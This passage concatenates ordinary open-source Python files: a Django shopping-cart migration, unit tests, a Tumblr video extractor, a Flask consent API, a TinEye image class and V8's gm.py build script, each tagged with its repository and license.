'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_type': ('django.db.models.fields.CharField', [], {'default': "'personal'", 'max_length': '32'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']", 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
| agpl-3.0 |
gitcoinco/web | app/dashboard/tests/test_bounty_state.py | 1 | 2398 | # -*- coding: utf-8 -*-
"""Test BountyState and BountyEvent interactions and FSM
Copyright (C) 2021 Gitcoin Core
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from datetime import timedelta
from django.utils import timezone
from dashboard.models import Bounty, BountyEvent
from test_plus.test import TestCase
class BountyStateTest(TestCase):
"""Define tests for bounty states and events."""
def setUp(self):
self.bounty = Bounty.objects.create(
title='foo',
project_type='traditional',
value_in_token=3,
token_name='USDT',
web3_created=timezone.now() - timedelta(days=7),
github_url='https://github.com/danlipert/gitcoin-test/issues/1',
token_address='0x0',
issue_description='hello world',
bounty_owner_github_username='example',
is_open=True,
accepted=True,
expires_date=timezone.now() + timedelta(days=1, hours=1),
idx_project_length=5,
project_length='Months',
bounty_type='Feature',
experience_level='Intermediate',
raw_data={},
idx_status='open',
bounty_owner_email='asdfasdf@bar.com',
current_bounty=True,
bounty_state='open'
)
def test_handle_event(self):
event = BountyEvent.objects.create(
bounty=self.bounty,
event_type='express_interest'
)
self.bounty.handle_event(event)
assert self.bounty.bounty_state == 'open'
event_accept = BountyEvent.objects.create(
bounty=self.bounty,
event_type='accept_worker'
)
self.bounty.handle_event(event_accept)
assert self.bounty.bounty_state == 'work_started'
| agpl-3.0 |
Manuel4131/youtube-dl | youtube_dl/extractor/tumblr.py | 79 | 3285 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class TumblrIE(InfoExtractor):
_VALID_URL = r'http://(?P<blog_name>.*?)\.tumblr\.com/(?:post|video)/(?P<id>[0-9]+)(?:$|[/?#])'
_TESTS = [{
'url': 'http://tatianamaslanydaily.tumblr.com/post/54196191430/orphan-black-dvd-extra-behind-the-scenes',
'md5': '479bb068e5b16462f5176a6828829767',
'info_dict': {
'id': '54196191430',
'ext': 'mp4',
'title': 'tatiana maslany news, Orphan Black || DVD extra - behind the scenes ↳...',
'description': 'md5:37db8211e40b50c7c44e95da14f630b7',
'thumbnail': 're:http://.*\.jpg',
}
}, {
'url': 'http://5sostrum.tumblr.com/post/90208453769/yall-forgetting-the-greatest-keek-of-them-all',
'md5': 'bf348ef8c0ef84fbf1cbd6fa6e000359',
'info_dict': {
'id': '90208453769',
'ext': 'mp4',
'title': '5SOS STRUM ;]',
'description': 'md5:dba62ac8639482759c8eb10ce474586a',
'thumbnail': 're:http://.*\.jpg',
}
}, {
'url': 'http://naked-yogi.tumblr.com/post/118312946248/naked-smoking-stretching',
'md5': 'de07e5211d60d4f3a2c3df757ea9f6ab',
'info_dict': {
'id': 'Wmur',
'ext': 'mp4',
'title': 'naked smoking & stretching',
'upload_date': '20150506',
'timestamp': 1430931613,
},
'add_ie': ['Vidme'],
}, {
'url': 'http://camdamage.tumblr.com/post/98846056295/',
'md5': 'a9e0c8371ea1ca306d6554e3fecf50b6',
'info_dict': {
'id': '105463834',
'ext': 'mp4',
'title': 'Cam Damage-HD 720p',
'uploader': 'John Moyer',
'uploader_id': 'user32021558',
},
'add_ie': ['Vimeo'],
}]
def _real_extract(self, url):
m_url = re.match(self._VALID_URL, url)
video_id = m_url.group('id')
blog = m_url.group('blog_name')
url = 'http://%s.tumblr.com/post/%s/' % (blog, video_id)
webpage, urlh = self._download_webpage_handle(url, video_id)
iframe_url = self._search_regex(
r'src=\'(https?://www\.tumblr\.com/video/[^\']+)\'',
webpage, 'iframe url', default=None)
if iframe_url is None:
return self.url_result(urlh.geturl(), 'Generic')
iframe = self._download_webpage(iframe_url, video_id,
'Downloading iframe page')
video_url = self._search_regex(r'<source src="([^"]+)"',
iframe, 'video url')
# The only place where you can get a title, it's not complete,
# but searching in other places doesn't work for all videos
video_title = self._html_search_regex(
r'(?s)<title>(?P<title>.*?)(?: \| Tumblr)?</title>',
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'ext': 'mp4',
'title': video_title,
'description': self._og_search_description(webpage, default=None),
'thumbnail': self._og_search_thumbnail(webpage, default=None),
}
| unlicense |
uzh/msregistry | app/api_1_0/user.py | 1 | 4643 | # Copyright (C) 2016 University of Zurich. All rights reserved.
#
# This file is part of MSRegistry Backend.
#
# MSRegistry Backend is free software: you can redistribute it and/or
# modify it under the terms of the version 3 of the GNU Affero General
# Public License as published by the Free Software Foundation, or any
# other later version.
#
# MSRegistry Backend is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the version
# 3 of the GNU Affero General Public License for more details.
#
# You should have received a copy of the version 3 of the GNU Affero
# General Public License along with MSRegistry Backend. If not, see
# <http://www.gnu.org/licenses/>.
__author__ = "Filippo Panessa <filippo.panessa@uzh.ch>"
__copyright__ = ("Copyright (c) 2016 S3IT, Zentrale Informatik,"
" University of Zurich")
from flask import jsonify, request
from flask import _app_ctx_stack as stack
from . import api
from app.models.user import User
from app.models.role import Role
from app import db
from app.auth.decorators import requires_auth, requires_roles
from app.exceptions import UserNotFound, MethodNotAllowed
from jsonschema import validate, ValidationError
from app import inputs
from app import utils
@api.route('/user')
@requires_auth
def get_user():
user = User()
result = user.getByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(result.serialize())
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent', methods=['GET'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def get_user_consent_info():
user = User()
result = user.getUserConsentByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(accepted=bool(result))
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent/info', methods=['GET'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def get_user_consent():
user = User()
result = user.getByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(result.serialize(stack.top.roles))
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent', methods=['POST'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def set_user_consent():
user = User()
consent = request.get_json(silent=True, force=True)
if Role.relative in stack.top.roles:
try:
validate(consent, inputs.user_consent_relative)
except ValidationError as error:
raise MethodNotAllowed(error.message)
try:
return jsonify(success=bool(user.setRelativeConsentByUniqueID(uniqueID=stack.top.uniqueID,
sex=consent['sex'],
birthdate=utils.Time.DMYToDatetime(consent['birthdate']),
signature=consent['signature'])))
except ValueError as error:
raise MethodNotAllowed(error.message)
except db.BadValueException as error:
raise MethodNotAllowed(error.message)
if Role.patient in stack.top.roles:
try:
validate(consent, inputs.user_consent_patient)
except ValidationError as error:
raise MethodNotAllowed(error.message)
try:
return jsonify(success=bool(user.setPatientConsentByUniqueID(uniqueID=stack.top.uniqueID,
sex=consent['sex'], birthdate=utils.Time.DMYToDatetime(consent['birthdate']),
signature=consent['signature'],
physician_contact_permitted=consent['physician_contact_permitted'],
medical_record_abstraction=consent['medical_record_abstraction'],
data_exchange_cohort=consent['data_exchange_cohort'])))
except ValueError as error:
raise MethodNotAllowed(error.message)
except db.BadValueException as error:
raise MethodNotAllowed(error.message)
else:
raise MethodNotAllowed('Bad value for field of type "roles". Reason: "Value cannot be null"')
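# Illustrative request body for the patient branch above (field names follow
# the code; the exact schema lives in inputs.user_consent_patient, which is
# not shown here, and the birthdate format is assumed from DMYToDatetime):
#   POST /user/consent
#   {"sex": "female", "birthdate": "01.01.1980", "signature": "...",
#    "physician_contact_permitted": true, "medical_record_abstraction": true,
#    "data_exchange_cohort": true}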
| agpl-3.0 |
TinEye/tineyeservices_python | tineyeservices/image.py | 1 | 1973 | # -*- coding: utf-8 -*-
# Copyright (c) 2018 TinEye. All rights reserved worldwide.
import contextlib
import os
class Image(object):
"""
Class representing an image.
Image on filesystem:
>>> from tineyeservices import Image
>>> image = Image(filepath='/path/to/image.jpg', collection_filepath='collection.jpg')
Image URL:
>>> image = Image(url='https://tineye.com/images/meloncat.jpg', collection_filepath='collection.jpg')
Image with metadata:
>>> import json
>>> metadata = json.dumps({"keywords": ["dolphin"]})
>>> image = Image(filepath='/path/to/image.jpg', metadata=metadata)
"""
def __init__(self, filepath='', url='', collection_filepath='', metadata=None):
self.data = None
self.filepath = filepath
self.url = url
self.collection_filepath = ''
# If a filepath is specified, read the image and use that as the collection filepath
if filepath != '':
with contextlib.closing(open(filepath, 'rb')) as fp:
self.data = fp.read()
self.collection_filepath = filepath
# If no filepath but a URL is specified, use the basename of the URL
# as the collection filepath
if self.data is None and self.url != '':
self.collection_filepath = os.path.basename(self.url)
# If user specified their own filepath, then use that instead
if collection_filepath != '':
self.collection_filepath = collection_filepath
# Need to make sure there is at least data or a URL
if self.data is None and self.url == '':
raise ValueError('Image object needs either data or a URL.')
self.metadata = metadata
def __repr__(self):
return "Image(filepath=%r, url=%r, collection_filepath=%r, metadata=%r)" %\
(self.filepath, self.url, self.collection_filepath, self.metadata)
| mit |
svenstaro/ansible | test/units/modules/network/ios/test_ios_command.py | 59 | 4059 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.ios import ios_command
from .ios_module import TestIosModule, load_fixture, set_module_args
class TestIosCommandModule(TestIosModule):
module = ios_command
def setUp(self):
self.mock_run_commands = patch('ansible.modules.network.ios.ios_command.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
self.mock_run_commands.stop()
def load_fixtures(self, commands=None):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item['command'])
command = obj['command']
except ValueError:
command = item['command']
filename = str(command).replace(' ', '_')
output.append(load_fixture(filename))
return output
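# Fixture lookup sketch: the mock above turns each command into a fixture
# filename by replacing spaces with underscores, so 'show version' is served
# from a fixture file named 'show_version' (its on-disk location is whatever
# load_fixture resolves to).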
self.run_commands.side_effect = load_from_file
def test_ios_command_simple(self):
set_module_args(dict(commands=['show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 1)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_multiple(self):
set_module_args(dict(commands=['show version', 'show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 2)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_wait_for(self):
wait_for = 'result[0] contains "Cisco IOS"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module()
def test_ios_command_wait_for_fails(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 10)
def test_ios_command_retries(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 2)
def test_ios_command_match_any(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
self.execute_module()
def test_ios_command_match_all(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "IOSv Software"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
self.execute_module()
def test_ios_command_match_all_failure(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
commands = ['show version', 'show version']
set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
self.execute_module(failed=True)
| gpl-3.0 |
weolar/miniblink49 | v8_7_5/tools/dev/gm.py | 3 | 13334 | #!/usr/bin/env python
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""\
Convenience wrapper for compiling V8 with gn/ninja and running tests.
Sets up build output directories if they don't exist.
Produces simulator builds for non-Intel target architectures.
Uses Goma by default if it is detected (at output directory setup time).
Expects to be run from the root of a V8 checkout.
Usage:
gm.py [<arch>].[<mode>[-<suffix>]].[<target>] [testname...]
All arguments are optional. Most combinations should work, e.g.:
gm.py ia32.debug x64.release x64.release-my-custom-opts d8
gm.py android_arm.release.check
gm.py x64 mjsunit/foo cctest/test-bar/*
"""
# See HELP below for additional documentation.
from __future__ import print_function
import errno
import os
import re
import subprocess
import sys
USE_PTY = "linux" in sys.platform
if USE_PTY:
import pty
BUILD_TARGETS_TEST = ["d8", "cctest", "unittests"]
BUILD_TARGETS_ALL = ["all"]
# All arches that this script understands.
ARCHES = ["ia32", "x64", "arm", "arm64", "mipsel", "mips64el", "ppc", "ppc64",
"s390", "s390x", "android_arm", "android_arm64"]
# Arches that get built/run when you don't specify any.
DEFAULT_ARCHES = ["ia32", "x64", "arm", "arm64"]
# Modes that this script understands.
MODES = ["release", "debug", "optdebug"]
# Modes that get built/run when you don't specify any.
DEFAULT_MODES = ["release", "debug"]
# Build targets that can be manually specified.
TARGETS = ["d8", "cctest", "unittests", "v8_fuzzers", "mkgrokdump",
"generate-bytecode-expectations", "inspector-test"]
# Build targets that get built when you don't specify any (and specified tests
# don't imply any other targets).
DEFAULT_TARGETS = ["d8"]
# Tests that run-tests.py would run by default that can be run with
# BUILD_TARGETS_TESTS.
DEFAULT_TESTS = ["cctest", "debugger", "intl", "message", "mjsunit",
"preparser", "unittests"]
# These can be suffixed to any <arch>.<mode> combo, or used standalone,
# or used as global modifiers (affecting all <arch>.<mode> combos).
ACTIONS = {
"all": {"targets": BUILD_TARGETS_ALL, "tests": []},
"tests": {"targets": BUILD_TARGETS_TEST, "tests": []},
"check": {"targets": BUILD_TARGETS_TEST, "tests": DEFAULT_TESTS},
"checkall": {"targets": BUILD_TARGETS_ALL, "tests": ["ALL"]},
}
HELP = """<arch> can be any of: %(arches)s
<mode> can be any of: %(modes)s
<target> can be any of:
- cctest, d8, unittests, v8_fuzzers (build respective binary)
- all (build all binaries)
- tests (build test binaries)
- check (build test binaries, run most tests)
- checkall (build all binaries, run more tests)
""" % {"arches": " ".join(ARCHES),
"modes": " ".join(MODES)}
TESTSUITES_TARGETS = {"benchmarks": "d8",
"cctest": "cctest",
"debugger": "d8",
"fuzzer": "v8_fuzzers",
"inspector": "inspector-test",
"intl": "d8",
"message": "d8",
"mjsunit": "d8",
"mozilla": "d8",
"preparser": "d8",
"test262": "d8",
"unittests": "unittests",
"webkit": "d8"}
OUTDIR = "out"
def DetectGoma():
home_goma = os.path.expanduser("~/goma")
if os.path.exists(home_goma):
return home_goma
if os.environ.get("GOMA_DIR"):
return os.environ.get("GOMA_DIR")
if os.environ.get("GOMADIR"):
return os.environ.get("GOMADIR")
return None
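# Note on precedence (as implemented above): an existing ~/goma directory wins
# over both the GOMA_DIR and GOMADIR environment variables, and GOMA_DIR is
# consulted before GOMADIR.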
GOMADIR = DetectGoma()
IS_GOMA_MACHINE = GOMADIR is not None
USE_GOMA = "true" if IS_GOMA_MACHINE else "false"
RELEASE_ARGS_TEMPLATE = """\
is_component_build = false
is_debug = false
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
v8_enable_verify_heap = true
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
DEBUG_ARGS_TEMPLATE = """\
is_component_build = true
is_debug = true
symbol_level = 2
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_fast_mksnapshot = true
v8_enable_slow_dchecks = true
v8_optimized_debug = false
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
OPTDEBUG_ARGS_TEMPLATE = """\
is_component_build = true
is_debug = true
symbol_level = 1
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_fast_mksnapshot = true
v8_enable_verify_heap = true
v8_optimized_debug = true
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
ARGS_TEMPLATES = {
"release": RELEASE_ARGS_TEMPLATE,
"debug": DEBUG_ARGS_TEMPLATE,
"optdebug": OPTDEBUG_ARGS_TEMPLATE
}
def PrintHelpAndExit():
print(__doc__)
print(HELP)
sys.exit(0)
def _Call(cmd, silent=False):
if not silent: print("# %s" % cmd)
return subprocess.call(cmd, shell=True)
def _CallWithOutputNoTerminal(cmd):
return subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def _CallWithOutput(cmd):
print("# %s" % cmd)
# The following trickery is required so that the 'cmd' thinks it's running
# in a real terminal, while this script gets to intercept its output.
master, slave = pty.openpty()
p = subprocess.Popen(cmd, shell=True, stdin=slave, stdout=slave, stderr=slave)
os.close(slave)
output = []
try:
while True:
try:
data = os.read(master, 512)
except OSError as e:
if e.errno != errno.EIO: raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
print(data, end="")
sys.stdout.flush()
output.append(data)
finally:
os.close(master)
p.wait()
return p.returncode, "".join(output)
def _Which(cmd):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, cmd)):
return os.path.join(path, cmd)
return None
def _Write(filename, content):
print("# echo > %s << EOF\n%sEOF" % (filename, content))
with open(filename, "w") as f:
f.write(content)
def _Notify(summary, body):
if _Which('notify-send') is not None:
_Call("notify-send '{}' '{}'".format(summary, body), silent=True)
else:
print("{} - {}".format(summary, body))
def GetPath(arch, mode):
subdir = "%s.%s" % (arch, mode)
return os.path.join(OUTDIR, subdir)
def PrepareMksnapshotCmdline(orig_cmdline, path):
result = "gdb --args %s/mksnapshot " % path
for w in orig_cmdline.split(" "):
if w.startswith("gen/") or w.startswith("snapshot_blob"):
result += ("%(path)s%(sep)s%(arg)s " %
{"path": path, "sep": os.sep, "arg": w})
else:
result += "%s " % w
return result
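# Sketch of the rewrite above (the failing command line is an assumption):
# for orig_cmdline '--startup_blob snapshot_blob.bin gen/embedded.S' and
# path 'out/x64.release' the result is roughly
#   gdb --args out/x64.release/mksnapshot --startup_blob
#   out/x64.release/snapshot_blob.bin out/x64.release/gen/embedded.S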
class Config(object):
def __init__(self, arch, mode, targets, tests=[]):
self.arch = arch
self.mode = mode
self.targets = set(targets)
self.tests = set(tests)
def Extend(self, targets, tests=[]):
self.targets.update(targets)
self.tests.update(tests)
def GetTargetCpu(self):
if self.arch == "android_arm": return "target_cpu = \"arm\""
if self.arch == "android_arm64": return "target_cpu = \"arm64\""
cpu = "x86"
if "64" in self.arch or self.arch == "s390x":
cpu = "x64"
return "target_cpu = \"%s\"" % cpu
def GetV8TargetCpu(self):
if self.arch == "android_arm": return "\nv8_target_cpu = \"arm\""
if self.arch == "android_arm64": return "\nv8_target_cpu = \"arm64\""
if self.arch in ("arm", "arm64", "mipsel", "mips64el", "ppc", "ppc64",
"s390", "s390x"):
return "\nv8_target_cpu = \"%s\"" % self.arch
return ""
def GetTargetOS(self):
if self.arch in ("android_arm", "android_arm64"):
return "\ntarget_os = \"android\""
return ""
def GetGnArgs(self):
# Use only substring before first '-' as the actual mode
mode = re.match("([^-]+)", self.mode).group(1)
template = ARGS_TEMPLATES[mode]
arch_specific = (self.GetTargetCpu() + self.GetV8TargetCpu() +
self.GetTargetOS())
return template % arch_specific
def Build(self):
path = GetPath(self.arch, self.mode)
args_gn = os.path.join(path, "args.gn")
build_ninja = os.path.join(path, "build.ninja")
if not os.path.exists(path):
print("# mkdir -p %s" % path)
os.makedirs(path)
if not os.path.exists(args_gn):
_Write(args_gn, self.GetGnArgs())
if not os.path.exists(build_ninja):
code = _Call("gn gen %s" % path)
if code != 0: return code
targets = " ".join(self.targets)
# The implementation of mksnapshot failure detection relies on
# the "pty" module and GDB presence, so skip it on non-Linux.
if not USE_PTY:
return _Call("autoninja -C %s %s" % (path, targets))
return_code, output = _CallWithOutput("autoninja -C %s %s" %
(path, targets))
if return_code != 0 and "FAILED:" in output and "snapshot_blob" in output:
csa_trap = re.compile("Specify option( --csa-trap-on-node=[^ ]*)")
match = csa_trap.search(output)
extra_opt = match.group(1) if match else ""
cmdline = re.compile("python ../../tools/run.py ./mksnapshot (.*)")
      mksnapshot_match = cmdline.search(output)
      if mksnapshot_match is None:
        return return_code  # output did not contain a recognizable cmdline
      orig_cmdline = mksnapshot_match.group(1).strip()
cmdline = PrepareMksnapshotCmdline(orig_cmdline, path) + extra_opt
_Notify("V8 build requires your attention",
"Detected mksnapshot failure, re-running in GDB...")
_Call(cmdline)
return return_code
def RunTests(self):
if not self.tests: return 0
if "ALL" in self.tests:
tests = ""
else:
tests = " ".join(self.tests)
return _Call('"%s" ' % sys.executable +
os.path.join("tools", "run-tests.py") +
" --outdir=%s %s" % (GetPath(self.arch, self.mode), tests))
def GetTestBinary(argstring):
for suite in TESTSUITES_TARGETS:
if argstring.startswith(suite): return TESTSUITES_TARGETS[suite]
return None
class ArgumentParser(object):
def __init__(self):
self.global_targets = set()
self.global_tests = set()
self.global_actions = set()
self.configs = {}
def PopulateConfigs(self, arches, modes, targets, tests):
for a in arches:
for m in modes:
path = GetPath(a, m)
if path not in self.configs:
self.configs[path] = Config(a, m, targets, tests)
else:
self.configs[path].Extend(targets, tests)
def ProcessGlobalActions(self):
have_configs = len(self.configs) > 0
for action in self.global_actions:
impact = ACTIONS[action]
      if have_configs:
for c in self.configs:
self.configs[c].Extend(**impact)
else:
self.PopulateConfigs(DEFAULT_ARCHES, DEFAULT_MODES, **impact)
def ParseArg(self, argstring):
if argstring in ("-h", "--help", "help"):
PrintHelpAndExit()
arches = []
modes = []
targets = []
actions = []
tests = []
# Specifying a single unit test looks like "unittests/Foo.Bar".
if argstring.startswith("unittests/"):
words = [argstring]
else:
words = argstring.split('.')
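    # Example: "x64.release.d8" selects arch "x64", mode "release" and
    # target "d8"; a bare word like "release" leaves the other dimensions
    # to be filled in from the defaults below.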
if len(words) == 1:
word = words[0]
if word in ACTIONS:
self.global_actions.add(word)
return
if word in TARGETS:
self.global_targets.add(word)
return
maybe_target = GetTestBinary(word)
if maybe_target is not None:
self.global_tests.add(word)
self.global_targets.add(maybe_target)
return
for word in words:
if word in ARCHES:
arches.append(word)
elif word in MODES:
modes.append(word)
elif word in TARGETS:
targets.append(word)
elif word in ACTIONS:
actions.append(word)
elif any(map(lambda x: word.startswith(x + "-"), MODES)):
modes.append(word)
else:
print("Didn't understand: %s" % word)
sys.exit(1)
# Process actions.
for action in actions:
impact = ACTIONS[action]
targets += impact["targets"]
tests += impact["tests"]
# Fill in defaults for things that weren't specified.
arches = arches or DEFAULT_ARCHES
modes = modes or DEFAULT_MODES
targets = targets or DEFAULT_TARGETS
# Produce configs.
self.PopulateConfigs(arches, modes, targets, tests)
def ParseArguments(self, argv):
if len(argv) == 0:
PrintHelpAndExit()
for argstring in argv:
self.ParseArg(argstring)
self.ProcessGlobalActions()
for c in self.configs:
self.configs[c].Extend(self.global_targets, self.global_tests)
return self.configs
def Main(argv):
parser = ArgumentParser()
configs = parser.ParseArguments(argv[1:])
return_code = 0
# If we have Goma but it is not running, start it.
if (GOMADIR is not None and
_Call("ps -e | grep compiler_proxy > /dev/null", silent=True) != 0):
_Call("%s/goma_ctl.py ensure_start" % GOMADIR)
for c in configs:
return_code += configs[c].Build()
if return_code == 0:
for c in configs:
return_code += configs[c].RunTests()
if return_code == 0:
_Notify('Done!', 'V8 compilation finished successfully.')
else:
_Notify('Error!', 'V8 compilation finished with errors.')
return return_code
if __name__ == "__main__":
sys.exit(Main(sys.argv))
| apache-2.0 |
shhui/nova | nova/tests/virt/baremetal/db/base.py | 53 | 1689 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
